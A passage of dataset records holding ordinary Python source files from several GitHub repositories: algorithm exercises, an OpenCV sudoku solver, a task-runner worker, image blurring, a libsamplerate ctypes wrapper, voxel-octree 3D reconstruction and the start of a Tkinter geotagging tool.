self.panel.SetBackgroundColour(c)","repo_name":"bmzk/sim-game","sub_path":"MyClass.py","file_name":"MyClass.py","file_ext":"py","file_size_in_byte":6290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74586935505","text":"class Solution:\n def sortedSquares(self, nums: List[int]) -> List[int]:\n left, right = 0, len(nums) - 1\n highest_square_idx = len(nums) - 1\n squares = [None] * len(nums)\n\n while left <= right:\n left_square = nums[left] * nums[left]\n right_square = nums[right] * nums[right]\n\n # Since it's sorted, we can use highest_square_idx\n # to place at the end to get our intended order\n if left_square > right_square:\n squares[highest_square_idx] = left_square\n left += 1\n else:\n squares[highest_square_idx] = right_square\n right -= 1\n\n highest_square_idx -= 1\n\n return squares\n\n# Time Complexity: O(n) since we iterate it once only\n\n# Space Complexity: O(n) this space is used up in the output array","repo_name":"garzeah/algorithms","sub_path":"general/two_pointers/squares_of_a_sorted_array.py","file_name":"squares_of_a_sorted_array.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40928703483","text":"print('Setting Up')\r\nimport os\r\n\r\nos.environ['TFF_CPP_MIN_LOG_LEVEL'] = '3' # TO get rid of the tensorflow warnings\r\n\r\nfrom utlis import *\r\nimport sudokusolver\r\n\r\npathImage = \"1.jpg\"\r\nheightImg = 450\r\nwidthImg = 450\r\n\r\nmodel = initializePredictionModel() # Load the CNN Model\r\n\r\n# 1. Preparing the Image\r\n\r\nimg = cv2.imread(pathImage)\r\nimg = cv2.resize(img, (heightImg, widthImg)) # resizing the image\r\nimgBlank = np.zeros((heightImg, widthImg, 3), np.uint8) # Create a blank image for testing debugging\r\nimgThreshold = preProcess(img)\r\n\r\n# 2. 
Find the Contours\r\n\r\nimgContours = img.copy() # Copy Image for Display Purposes (Will contain all the contours)\r\nimgBigContour = img.copy() # Copy Image for Display Purposes (Will contain the biggest contour)\r\ncontours, hierarchy = cv2.findContours(imgThreshold, cv2.RETR_EXTERNAL,\r\n cv2.CHAIN_APPROX_SIMPLE) # Find all the contours\r\ncv2.drawContours(imgContours, contours, -1, (0, 255, 0), 3) # Draw all the detected contours\r\n\r\n# 3. Find the largest contour and use it as our Sudoku Puzzle\r\nbiggest, maxArea = biggestContour(contours)\r\nif biggest.size != 0:\r\n biggest = reorder(biggest)\r\n cv2.drawContours(imgBigContour, biggest, -1, (0, 0, 255), 25) # draw the biggest contour\r\n pts1 = np.float32(biggest) # prepare points for WARP\r\n pts2 = np.float32([[0, 0], [widthImg, 0], [0, heightImg], [widthImg, heightImg]]) # prepare points\r\n matrix = cv2.getPerspectiveTransform(pts1, pts2) # GER\r\n imgWarpColored = cv2.warpPerspective(img, matrix, (widthImg, heightImg))\r\n imgDetectedDigits = imgBlank.copy()\r\n imgWarpColored = cv2.cvtColor(imgWarpColored, cv2.COLOR_BGR2GRAY)\r\n\r\n # 4. Split the image and find each digit available (Digit Detection)\r\n imgSolvedDigits = imgBlank.copy()\r\n boxes = splitBoxes(imgWarpColored)\r\n numbers = getPrediction(boxes, model)\r\n imgDetectedDigits = displayNumbers(imgDetectedDigits, numbers, color=(255, 0, 255))\r\n # cv2.imshow(\"v\", imgDetectedDigits)\r\n numbers = np.asarray(numbers)\r\n # print(numbers)\r\n posArray = np.where(numbers > 0, 0,1) # This places '1' in the empty places and '0' in the places where we have numbers (FOR OUR BOARD)\r\n # print(posArray)\r\n\r\n # FIND SOLUTION OF THE BOARD\r\n board = np.array_split(numbers, 9)\r\n\r\n try:\r\n sudokusolver.solve(board)\r\n except:\r\n pass\r\n #print(board)\r\n flatlist=[] #to get the solved values in a single list , the way we have been dealing with\r\n for sublist in board:\r\n for item in sublist:\r\n flatlist.append(item)\r\n solvedNumbers = flatlist*posArray #to get only the solved values in sudoku puzzle and not the original values(only the values which are new)\r\n #print(solvedNumbers)\r\n imgSolvedDigits = displayNumbers(imgSolvedDigits, solvedNumbers)\r\n\r\n #Overlay Solution\r\n\r\n #(Here First We apply Inverse WARP Perspective to get place the solved numbers on the original image's perspective and then overlay it on the original image))\r\n pts2=np.float32(biggest) #Prepare points for WARP\r\n pts1=np.float32([[0, 0], [widthImg, 0], [0, heightImg], [widthImg, heightImg]]) # prepare points\r\n matrix=cv2.getPerspectiveTransform(pts1,pts2) #GER (Inverse Matrix)\r\n imgInvWarpColored=img.copy()\r\n imgInvWarpColored=cv2.warpPerspective(imgSolvedDigits,matrix,(widthImg,heightImg))\r\n inv_perspective=cv2.addWeighted(imgInvWarpColored,1,img,0.5,1)\r\n imgDetectedDigits=drawGrid(imgDetectedDigits)\r\n imgSolvedDigits=drawGrid(imgSolvedDigits)\r\n\r\nimgArray=([img,imgThreshold,imgContours,imgBigContour],\r\n [imgDetectedDigits,imgSolvedDigits,imgInvWarpColored,inv_perspective])\r\nstackedImage=stackImages(imgArray,1)\r\nstackedImage=cv2.resize(stackedImage, (700,450), interpolation = cv2.INTER_AREA)\r\ncv2.imshow(\"stacked Images\",stackedImage)\r\n\r\n\r\n\r\n\r\ncv2.waitKey(0)\r\n","repo_name":"dhruvshah116/Python-OpevCV-Sudoku-Solver","sub_path":"sudokumain.py","file_name":"sudokumain.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 
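A minimal sketch of the digit-masking step used in the sudoku record above: posArray marks the cells that were empty on the photographed puzzle, so multiplying the solver's flat list by it keeps only the newly solved digits. The 4-cell "board" here is invented purely for illustration; the real script works on all 81 cells.

import numpy as np

numbers = np.array([5, 0, 0, 3])         # detected digits; 0 means the cell was empty
posArray = np.where(numbers > 0, 0, 1)   # [0, 1, 1, 0]: 1 flags the empty cells
flatlist = np.array([5, 1, 9, 3])        # the board after the solver filled it in
solvedNumbers = flatlist * posArray      # [0, 1, 9, 0]: only the new digits survive
print(solvedNumbers)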
+{"seq_id":"22997723070","text":"import subprocess\nimport json\nimport sys\nimport argparse\n\n\ndef runtime_objects():\n parser = argparse.ArgumentParser(description='Pypillar argument processing')\n parser.add_argument('--PYPILLAR', help='Variable which contain all pypillar objects for future references.')\n args = parser.parse_args()\n return json.loads(args.PYPILLAR)\n\nclass Worker:\n def __init__(self, tasks, post_data, request_id):\n self.tasks = tasks\n self.post_data = post_data\n self.request_id = request_id\n self.task_input = {}\n self.output = None\n self.error = {}\n self.data = {}\n self.sys_error = False\n\n def run(self):\n for rule in self.tasks:\n try:\n self.data['PYPILLAR_TASK_INFO'] = rule\n self.data['PYPILLAR_POST_DATA_FILE'] = self.post_data\n self.data['PYPILLAR_UNIQUE_REQUEST_ID'] = self.request_id\n self.data['PYPILLAR_TASK_INPUT'] = self.task_input\n\n command = [sys.executable, rule['script'], '--PYPILLAR', json.dumps(self.data)]\n runtime_log = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True, universal_newlines=True)\n\n with open(rule['task_log_path'], \"w+\") as outfile:\n outfile.write(runtime_log)\n\n try:\n runtime_log = json.loads(runtime_log)\n if runtime_log.get('PYPILLAR_TASK_INPUT'):\n self.task_input = runtime_log['PYPILLAR_TASK_INPUT']\n if runtime_log.get('PYPILLAR_RESULT'):\n self.output = runtime_log\n break\n except Exception:\n pass\n\n except subprocess.CalledProcessError as exc:\n with open(rule['task_log_path'], \"w+\") as outfile:\n outfile.write(exc.output)\n\n self.error['error'] = f'Task({rule[\"name\"]}): Failed. Check task log for more info.'\n self.sys_error = True\n break\n\n if self.sys_error:\n self.sys_error = False\n return json.dumps(self.error)\n\n elif self.output:\n return json.dumps(self.output)\n\n else:\n return json.dumps({\"PYPILLAR_RESULT\": {}})","repo_name":"washim/pypillar","sub_path":"pypillar/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21911183653","text":"\"\"\"\nFile: blur.py\nAuthor: David\n-------------------------------\nThis file shows the original image(smiley-face.png)\nfirst, and then its blurred image. The blur algorithm\nuses the average RGB values of a pixel's nearest neighbors.\n\"\"\"\n\nfrom simpleimage import SimpleImage\n\n\ndef blur(img):\n \"\"\"\n :param img: SimpleImage, the image to be blurred\n :return: SimpleImage, the blurred image\n \"\"\"\n # Create a blank frame for blurred pixels.\n blur_img = SimpleImage.blank(img.width, img.height)\n # Loop the original image.\n for x in range(img.width):\n for y in range(img.height):\n # Set up variables for pixels to be processed.\n red_total = 0\n green_total = 0\n blue_total = 0\n \"\"\"\n Because the number of pixels to be processed is not sure, \n I create a variable, count, to calculate how many pixels are added in the process. 
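            For example, at an image corner only 4 of the 9 neighborhood
            positions fall inside the image, so count ends up as 4 there,
            while every interior pixel averages all 9.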
\n \"\"\"\n count = 0\n # Loop the pixels to be processed (pixels in the style box while the designated pixel at the middle)\n for x1 in range(x-1, x+2):\n for y1 in range(y-1, y+2):\n \"\"\"\n I wrote this if condition to ensure some special cases, like corners and sides,\n will not fail during the calculation.\n \"\"\"\n if 0 <= x1 < img.width and 0 <= y1 < img.height:\n img_p = img.get_pixel(x1, y1)\n count += 1\n red_total += img_p.red\n green_total += img_p.green\n blue_total += img_p.blue\n # Calculate the average of the pixels in the style box and put them into the blank frame.\n blur_img_p = blur_img.get_pixel(x, y)\n blur_img_p.red = red_total//count\n blur_img_p.green = green_total//count\n blur_img_p.blue = blue_total//count\n return blur_img\n\n\ndef main():\n \"\"\"\n This program blurs the smiley-face image.\n \"\"\"\n old_img = SimpleImage(\"images/smiley-face.png\")\n old_img.show()\n # Blur the image for 5 times.\n blurred_img = blur(old_img)\n for i in range(4):\n blurred_img = blur(blurred_img)\n blurred_img.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"YuHaoHan/MystanCodeProjects","sub_path":"stanCode_Projects/my_photoshop/blur.py","file_name":"blur.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37335939483","text":"import ctypes\nimport ctypes.util\nimport math\n\n\nSRC_SINC_BEST_QUALITY = 0\nSRC_SINC_MEDIUM_QUALITY = 1\nSRC_SINC_FASTEST = 2\nSRC_ZERO_ORDER_HOLD = 3\nSRC_LINEAR = 4\n\n\nclass SampleRate():\n\n _BUF_FRAME_COUNT = 4096\n\n def __init__(self, converter_type, channels):\n \"\"\"Create a new sample rate converter.\n\n Arguments:\n converter_type -- The converter type.\n channels -- Number of channels.\n\n \"\"\"\n self._channels = channels\n\n error = ctypes.c_int(0)\n self._state = _samplerate.src_new(converter_type, channels, ctypes.byref(error))\n if self._state == None:\n err_cstr = _samplerate.src_strerror(error)\n raise SampleRateError('Could not set up sample rate conversion: {}'.format(\n str(err_cstr, encoding='utf-8')))\n\n self._input_data = [[] for _ in range(self._channels)]\n self._allow_input = True\n\n self._in_buf = (ctypes.c_float * (self._BUF_FRAME_COUNT * self._channels))()\n self._out_buf = (ctypes.c_float * (self._BUF_FRAME_COUNT * self._channels))()\n\n self._data = _SRC_DATA(\n ctypes.cast(self._in_buf, ctypes.POINTER(ctypes.c_float)),\n ctypes.cast(self._out_buf, ctypes.POINTER(ctypes.c_float)),\n 0, 0, # input & output frames\n 0, 0, # filled by libsamplerate\n 0, # end of input\n 1.0) # ratio\n\n self._prev_orig_frame_count = 0\n self._prev_est_frame_count = 0\n self._cur_orig_frame_count = 0\n self._cur_est_frame_count = 0\n self._out_frame_count = 0\n\n def set_ratio(self, ratio, smooth=True):\n \"\"\"Set sample rate conversion ratio.\n\n Arguments:\n ratio -- The conversion ratio.\n smooth -- Use smooth transition of conversion ratio.\n\n \"\"\"\n if math.isnan(ratio) or math.isinf(ratio) or (ratio <= 0.0):\n raise ValueError('Invalid sample rate conversion ratio: {}'.format(ratio))\n\n if self._data.src_ratio != ratio:\n self._prev_orig_frame_count += self._cur_orig_frame_count\n self._prev_est_frame_count += self._cur_est_frame_count\n self._cur_orig_frame_count = 0\n self._cur_est_frame_count = 0\n\n self._data.src_ratio = ratio\n\n if not smooth:\n error = _samplerate.src_set_ratio(self._state, ratio)\n if error != 0:\n err_cstr = _samplerate.src_strerror(error)\n raise SampleRateError('Could not 
set new conversion ratio: {}'.format(\n str(err_cstr, encoding='utf-8')))\n\n def add_input_data(self, *data, end_of_input=True):\n \"\"\"Add input audio data to the sample rate converter.\n\n Arguments:\n data -- The input data, each channel as a separate argument.\n end_of_input -- True if data is the end of input data. It is an\n error to call this function after a previous call\n with this value set to True.\n\n \"\"\"\n if not self._allow_input:\n raise SampleRateError(\n 'More input data provided after indicating end of input')\n\n if len(data) != self._channels:\n raise ValueError('Expected {} input channels, got {}'.format(\n self._channels, len(data)))\n\n self._cur_orig_frame_count += len(data[0])\n self._cur_est_frame_count = int(\n self._cur_orig_frame_count * self._data.src_ratio)\n\n frame_count = len(data[0])\n for ch in range(self._channels):\n if len(data[ch]) != frame_count:\n raise ValueError('Input channel buffer lengths do not match')\n self._input_data[ch].extend(data[ch])\n\n if end_of_input:\n self._allow_input = False\n\n def _get_total_est_frame_count(self):\n return self._cur_est_frame_count + self._prev_est_frame_count\n\n def get_output_data(self):\n \"\"\"Get converted audio data.\n\n Return value:\n A tuple containing audio data for each channel. The returned\n audio data contains all converted data of fed input data so\n far.\n\n \"\"\"\n\n frames_left = len(self._input_data[0])\n\n cur_offset = 0\n output_data = [[] for _ in range(self._channels)]\n\n def process():\n error = _samplerate.src_process(self._state, self._data)\n if error != 0:\n err_cstr = _samplerate.src_strerror(error)\n raise SampleRateError('Error while converting data: {}'.format(\n str(err_cstr, encoding='utf-8')))\n\n def extend_output():\n generated = self._data.output_frames_gen\n self._out_frame_count += generated\n for ch in range(self._channels):\n output_data[ch].extend(self._data.data_out[\n ch : ch + self._channels * generated : self._channels])\n\n while frames_left > 0:\n orig_frame_count = min(self._BUF_FRAME_COUNT, frames_left)\n last_chunk = (not self._allow_input) and (orig_frame_count == frames_left)\n\n # Fill input buffer\n orig_item_count = self._channels * orig_frame_count\n for ch in range(self._channels):\n self._in_buf[ch : ch + orig_item_count : self._channels] = (\n self._input_data[ch][cur_offset:cur_offset + orig_frame_count])\n\n frame_count = orig_frame_count\n\n self._data.data_in = ctypes.cast(\n self._in_buf, ctypes.POINTER(ctypes.c_float))\n self._data.input_frames = frame_count\n self._data.output_frames = self._BUF_FRAME_COUNT\n self._data.input_frames_used = -1\n self._data.output_frames_gen = 0\n self._data.end_of_input = 1 if last_chunk else 0\n\n # Convert\n while frame_count > 0:\n process()\n\n # Get converted data\n extend_output()\n\n assert self._data.input_frames_used >= 0\n\n frame_count -= self._data.input_frames_used\n\n # Move input pointer forwards in case we didn't consume all input\n elem_offset = self._channels * (orig_frame_count - frame_count)\n self._data.data_in = ctypes.cast(\n ctypes.byref(\n self._in_buf, elem_offset * ctypes.sizeof(ctypes.c_float)),\n ctypes.POINTER(ctypes.c_float))\n\n self._data.input_frames = frame_count\n self._data.input_frames_used = 0\n self._data.output_frames_gen = 0\n\n cur_offset += orig_frame_count - frame_count\n frames_left -= orig_frame_count - frame_count\n\n if not self._allow_input:\n assert frames_left == 0\n\n # Make sure we get all the remaining output data\n self._in_buf[:] = [0.0] * 
(self._BUF_FRAME_COUNT * self._channels)\n self._data.input_frames = 0\n self._data.output_frames = self._BUF_FRAME_COUNT\n self._data.input_frames_used = 0\n self._data.output_frames_gen = 0\n self._data.end_of_input = 0\n\n process()\n\n while self._data.output_frames_gen > 0:\n extend_output()\n\n self._data.input_frames = 0\n self._data.output_frames = self._BUF_FRAME_COUNT\n self._data.input_frames_used = 0\n self._data.output_frames_gen = 0\n self._data.end_of_input = 1\n\n process()\n\n # Clear input\n self._input_data = [[] for _ in range(self._channels)]\n\n else:\n if frames_left == 0:\n self._input_data = [[] for _ in range(self._channels)]\n else:\n for ch in range(self._channels):\n self._input_data[ch] = self._input_data[ch][-frames_left:]\n\n return tuple(output_data)\n\n def reset(self):\n \"\"\"Reset the internal state of the sample rate converter.\n\n \"\"\"\n error = _samplerate.src_reset(self._state)\n if error != 0:\n err_cstr = _samplerate.src_strerror(error)\n raise SampleRateError('Could not reset resampling state: {}'.format(\n str(err_cstr, encoding='utf-8')))\n\n self._input_data = [[] for _ in range(self._channels)]\n self._allow_input = True\n\n def __del__(self):\n if self._state == None:\n return\n\n _samplerate.src_delete(self._state)\n self._state = None\n\n\nclass SampleRateError(Exception):\n \"\"\"Class for libsamplerate-related errors.\n\n \"\"\"\n\n\n_SRC_STATE = ctypes.c_void_p\n\nclass _SRC_DATA(ctypes.Structure):\n _fields_ = [('data_in', ctypes.POINTER(ctypes.c_float)),\n ('data_out', ctypes.POINTER(ctypes.c_float)),\n ('input_frames', ctypes.c_long),\n ('output_frames', ctypes.c_long),\n ('input_frames_used', ctypes.c_long),\n ('output_frames_gen', ctypes.c_long),\n ('end_of_input', ctypes.c_int),\n ('src_ratio', ctypes.c_double)]\n\n\n_samplerate = ctypes.CDLL(ctypes.util.find_library('samplerate'))\n\n_samplerate.src_strerror.argtypes = [ctypes.c_int]\n_samplerate.src_strerror.restype = ctypes.c_char_p\n\n_samplerate.src_new.argtypes = [\n ctypes.c_int, # converter type\n ctypes.c_int, # channels\n ctypes.POINTER(ctypes.c_int), # error code destination\n ]\n_samplerate.src_new.restype = _SRC_STATE\n\n_samplerate.src_process.argtypes = [_SRC_STATE, ctypes.POINTER(_SRC_DATA)]\n_samplerate.src_process.restype = ctypes.c_int\n\n_samplerate.src_reset.argtypes = [_SRC_STATE]\n_samplerate.src_reset.restype = ctypes.c_int\n\n_samplerate.src_set_ratio.argtypes = [_SRC_STATE, ctypes.c_double]\n_samplerate.src_set_ratio.restype = ctypes.c_int\n\n_samplerate.src_delete.argtypes = [_SRC_STATE]\n_samplerate.src_delete.restype = _SRC_STATE\n\n\n","repo_name":"Jasu/kunquat","sub_path":"kunquat/extras/samplerate.py","file_name":"samplerate.py","file_ext":"py","file_size_in_byte":10058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"33969619755","text":"from __future__ import division, print_function, absolute_import\n\nimport collections\nimport math\nimport numpy\n\nfrom .multi_view_reconstruction import get_bounding_box_voxel_projected\nfrom ..object import VoxelOctree\n# ==============================================================================\n# Function for no kep\n\ndef voxel_is_visible_in_image(voxel_center,\n voxel_size,\n image,\n projection,\n inclusive):\n \"\"\"\n Return True or False if the voxel projected on image with the function\n projection (projection) have positive value on image.\n\n **Algorithm**\n\n 1. 
Project the center voxel position on image if the position projected\n (x, y) is positive on image return True\n\n |\n\n 2. Project the bounding box of voxel in image, if one of the 4 corners\n position of the bounding box projected have positive value on image\n return True\n\n |\n\n 3. Check if one pixel containing in the bounding box projected on image\n have positive value, if yes return True else return False\n\n Parameters\n ----------\n voxel_center : (x, y, z)\n Center position of voxel\n\n voxel_size : float\n Size of side geometry of voxel\n\n image: numpy.ndarray\n binary image\n\n projection : function ((x, y, z)) -> (x, y)\n Function of projection who take 1 argument (tuple of position (x, y, z))\n and return this position 2D (x, y)\n\n Returns\n -------\n out : bool\n True if voxel have a positive correspondence on image otherwise return\n False\n \"\"\"\n\n height_image, length_image = image.shape\n x, y = projection(voxel_center)\n\n if (0 <= x < length_image and\n 0 <= y < height_image and\n image[int(y), int(x)] > 0):\n return True\n\n # ==========================================================================\n\n x_min, x_max, y_min, y_max = get_bounding_box_voxel_projected(\n voxel_center, voxel_size, projection)\n\n if (x_max < 0 or x_min >= length_image or\n y_max < 0 or y_min >= height_image):\n return inclusive\n\n # if ((not (0 <= x_min < length_image or 0 <= x_max < length_image)) or\n # (not (0 <= y_min < height_image or 0 <= y_max < height_image))):\n # return inclusive\n\n x_min = int(min(max(math.floor(x_min), 0), length_image - 1))\n x_max = int(min(max(math.ceil(x_max), 0), length_image - 1))\n y_min = int(min(max(math.floor(y_min), 0), height_image - 1))\n y_max = int(min(max(math.ceil(y_max), 0), height_image - 1))\n\n if (image[y_min, x_min] > 0 or\n image[y_max, x_min] > 0 or\n image[y_min, x_max] > 0 or\n image[y_max, x_max] > 0):\n return True\n\n # ==========================================================================\n\n if numpy.any(image[y_min:y_max + 1, x_min:x_max + 1] > 0):\n return True\n\n return False\n\n\n\ndef voxel_is_fully_visible_in_image(voxel_center,\n voxel_size,\n image,\n projection):\n\n height_image, length_image = image.shape\n\n # ==========================================================================\n\n x_min, x_max, y_min, y_max = get_bounding_box_voxel_projected(\n voxel_center, voxel_size, projection)\n\n x_min = int(min(max(math.floor(x_min), 0), length_image - 1))\n x_max = int(min(max(math.ceil(x_max), 0), length_image - 1))\n y_min = int(min(max(math.floor(y_min), 0), height_image - 1))\n y_max = int(min(max(math.ceil(y_max), 0), height_image - 1))\n\n # ==========================================================================\n\n if numpy.all(image[y_min:y_max + 1, x_min:x_max + 1] > 0):\n return True\n\n return False\n\n\ndef remove_surrounded(leaf_nodes):\n kept = collections.deque()\n for leaf in leaf_nodes:\n\n if not leaf.is_surrender():\n kept.append(leaf)\n\n return kept\n\n\ndef remove_surrounded_fully_visible(leaf_nodes,\n images_projections,\n error_tolerance=0):\n kept = collections.deque()\n for leaf in leaf_nodes:\n\n if leaf.is_surrender():\n\n voxel_center = leaf.position\n voxel_size = leaf.size\n negative_weight = 0\n\n for image, projection in images_projections:\n if not voxel_is_fully_visible_in_image(\n voxel_center, voxel_size, image, projection):\n negative_weight += 1\n if negative_weight > error_tolerance:\n break\n\n if not negative_weight <= error_tolerance:\n kept.append(leaf)\n\n 
else:\n kept.append(leaf)\n\n return kept\n\n# ==============================================================================\n\n\ndef _keep_visible(voxels_node,\n image_views,\n error_tolerance=0):\n\n kept = collections.deque()\n for voxel_node in voxels_node:\n\n voxel_position = voxel_node.position\n voxel_size = voxel_node.size\n negative_weight = 0\n\n for image_view in image_views:\n if not voxel_is_visible_in_image(\n voxel_position,\n voxel_size,\n image_view.image,\n image_view.projection,\n image_view.inclusive):\n negative_weight += 1\n if negative_weight > error_tolerance:\n break\n\n if negative_weight <= error_tolerance:\n kept.append(voxel_node)\n\n else:\n voxel_node.data = False\n\n return kept\n\n\n# ==============================================================================\n\ndef reconstruction_3d_octree(image_views,\n voxels_size=4,\n error_tolerance=0,\n voxel_center_origin=(0.0, 0.0, 0.0),\n world_size=4096,\n verbose=False):\n \"\"\"\n Construct a list of voxel represented object with positive value on binary\n image in images of images_projections.\n\n Parameters\n ----------\n images_projections : [(image, projection), ...]\n List of tuple (image, projection) where image is a binary image\n (numpy.ndarray) and function projection (function (x, y, z) -> (x, y))\n who take (x, y, z) position on return (x, y) position according space\n representation of this image\n\n voxels_size : float, optional\n Size of side geometry of voxel that each voxel will have\n\n error_tolerance : int, optional\n\n\n voxel_center_origin : (x, y, z), optional\n Center position of the first original voxel, who will be split.\n\n world_size: int, optional\n Minimum size that the origin voxel size must include at beginning\n\n voxel_centers : collections.deque, optional\n List of first original voxel who will be split. 
If None, a list is\n create with the voxel_center_origin value.\n\n verbose : bool, optional\n If True, print for each iteration of split, number of voxel before and\n after projection on images\n\n Returns\n -------\n out : collections.deque\n List of visible voxel projected on each image according\n the error_tolerance\n \"\"\"\n\n if len(image_views) == 0:\n raise ValueError(\"Len images view have not length\")\n\n voxel_octree = VoxelOctree.from_position(\n voxel_center_origin, world_size, True)\n\n leaf_nodes = collections.deque()\n leaf_nodes.append(voxel_octree.root)\n\n nb_iteration = 0\n while voxels_size < world_size:\n voxels_size *= 2.0\n nb_iteration += 1\n\n for i in range(nb_iteration):\n\n tmp = collections.deque()\n for leaf in leaf_nodes:\n tmp.extend(leaf.creates_sons())\n leaf_nodes = tmp\n\n if verbose is True:\n print('Iteration', i + 1, '/', nb_iteration, end=\"\")\n print(' : ', len(leaf_nodes), end=\"\")\n\n leaf_nodes = _keep_visible(leaf_nodes,\n image_views,\n error_tolerance)\n\n # Gain time is not enough for keeping that\n # if i + 1 < nb_iteration:\n # leaf_nodes = remove_surrounded_fully_visible(leaf_nodes,\n # images_projections,\n # error_tolerance)\n\n if verbose is True:\n print(' - ', len(leaf_nodes))\n\n return voxel_octree\n","repo_name":"openalea/phenomenal","sub_path":"src/openalea/phenomenal/multi_view_reconstruction/_multi_view_reconstruction_octree.py","file_name":"_multi_view_reconstruction_octree.py","file_ext":"py","file_size_in_byte":8711,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"48"} +{"seq_id":"2344919828","text":"import sys\nsys.setrecursionlimit(10 ** 9)\n\n\n# 분할 정복\ndef divide(start, end, lev):\n # 시작 점과 끝 점이 크로스되면 리턴\n if start > end:\n return\n center = (start + end) // 2 # 루트 노드\n level[lev].append(n[center]) # 루트 노드를 레벨의 따라 리스트에 추가\n divide(start, center - 1, lev + 1) # 왼쪽 서브 트리의 루트 노드를 재귀적으로 탐색\n divide(center + 1, end, lev + 1) # 오른쪽 서브 트리의 루트 노드를 재귀적으로 탐색\n\n\nk = int(sys.stdin.readline())\nn = list(map(int, sys.stdin.readline().split()))\nlevel = [[] for _ in range(k)] \n\n# 분할 탐색\ndivide(0, len(n) - 1, 0)\n\n# 각 레벨의 따라 노드를 출력\nfor i in level:\n print(*i)\n","repo_name":"junjange/CodingTest","sub_path":"baekjoon/Tree/9934.py","file_name":"9934.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19774465544","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\ndef main():\n entrada = input().split()\n eur = int(entrada[0])\n cent = int(entrada[1])\n \n eur500 = eur // 500\n eur = eur % 500\n print('Bitllets de 500 euros:', eur500)\n eur200 = eur // 200\n eur = eur % 200\n print('Bitllets de 200 euros:', eur200)\n eur100 = eur // 100\n eur = eur % 100\n print('Bitllets de 100 euros:', eur100)\n eur50 = eur // 50\n eur = eur % 50\n print('Bitllets de 50 euros:', eur50)\n eur20 = eur // 20\n eur = eur % 20\n print('Bitllets de 20 euros:', eur20)\n eur10 = eur // 10\n eur = eur % 10\n print('Bitllets de 10 euros:', eur10)\n eur5 = eur // 5\n eur = eur % 5\n print('Bitllets de 5 euros:', eur5)\n eur2 = eur // 2\n eur = eur % 2\n print('Monedes de 2 euros:', eur2)\n print('Monedes de 1 euro:', eur)\n\n cent50 = cent // 50\n cent = cent % 50\n print('Monedes de 50 centims:', cent50)\n cent20 = cent // 20\n cent = cent % 20\n print('Monedes de 20 centims:', cent20)\n cent10 = cent // 10\n cent = cent % 10\n print('Monedes de 10 centims:', cent10)\n cent5 = cent // 5\n cent = 
cent % 5\n print('Monedes de 5 centims:', cent5)\n cent2 = cent // 2\n cent = cent % 2\n print('Monedes de 2 centims:', cent2)\n print('Monedes de 1 centim:', cent)\n\n\nmain()\n","repo_name":"NIL6NIL6/Jutge-Learning-to-program","sub_path":"01 - Introduction/17 - P81629 - Canvi mínim.py","file_name":"17 - P81629 - Canvi mínim.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74430855825","text":"import tkinter as tk\nimport tkinter.filedialog as fg\nfrom backend import Project\nimport os\nimport datetime\nimport pandas as pd\nfrom pytz import timezone\nimport pytz\nfrom threading import Thread\n\n#WINDOW CLASS FORMAT (doesnt include __init__)\n#1. WINDOW VARIABLES\n#2. WINDOW ELEMENTS\n#3. DRAW COMMANDS\n#4. WINDOW FUNCTIONS\n\nclass GeotagTool(tk.Tk): # controller\n \n def __init__(self, *args, **kwargs): \n \n tk.Tk.__init__(self, *args, **kwargs) \n \n self.project = Project()\n \n container = tk.Frame(self) \n container.pack(side = \"top\", fill = \"both\", expand = True) \n container.grid_rowconfigure(0, weight = 1) \n container.grid_columnconfigure(0, weight = 1) \n \n self.frames = {} \n \n for F in (StartPage, LoadProjectPage, LoadDataPage, ExportPage): \n \n frame = F(container, self) \n \n self.frames[F] = frame \n \n frame.grid(row = 0, column = 0, sticky =\"nsew\") #This is the problem, also have to convert all grids to packs\n \n self.show_frame(StartPage) \n \n def show_frame(self, cont): \n frame = self.frames[cont] \n frame.tkraise() \n \n# Choose to create a project or load an existing project \nclass StartPage(tk.Frame): \n def __init__(self, parent, controller): \n\n tk.Frame.__init__(self, parent) \n \n #WINDOW VARIABLES\n version = '0.0.1'\n \n #WINDOW ELEMENTS\n window_label = tk.Label(self,text ='Geotag Tool '+version,font=('Arial',12,'bold'))\n \n create_button = tk.Button(self, text ='New Project', \n command = lambda : controller.show_frame(LoadDataPage))\n \n load_button = tk.Button(self, text ='Load Project', \n command = lambda : controller.show_frame(LoadProjectPage))\n \n #DRAW COMMANDS\n window_label.grid(row = 0, column = 0, pady = 10)\n create_button.grid(row = 3, column = 0, padx = 10, pady = 10, sticky = 'W') \n load_button.grid(row = 4, column = 0, padx = 10, pady = 10, sticky = 'W') \n\n#Page where user can select a project folder that has been previously generated and load the data from that folder\nclass LoadProjectPage(tk.Frame): \n \n def __init__(self, parent, controller): \n tk.Frame.__init__(self, parent)\n \n #WINDOW VARIABLES\n self.controller = controller\n self.parent = parent\n \n #WINDOW ELEMENTS\n path_button = tk.Button(self, text = 'Select',\n command = self.get_p_path)\n \n path_label = tk.Label(self, text = 'Project File( .pkl): ')\n \n self.path_str = tk.StringVar()\n \n self.path_entry = tk.Entry(self, textvariable = self.path_str)\n \n load_button = tk.Button(self, text = 'Load Project',\n command = self.load_project)\n \n back_button = tk.Button(self, text =\"Back\", \n command = lambda : controller.show_frame(StartPage)) \n \n #DRAW COMMANDS\n path_button.grid(row = 1, column = 3, sticky = 'W', pady = 15)\n path_label.grid(row = 1, column = 1, sticky = 'W', pady = 15)\n self.path_entry.grid(row = 1, column = 2, 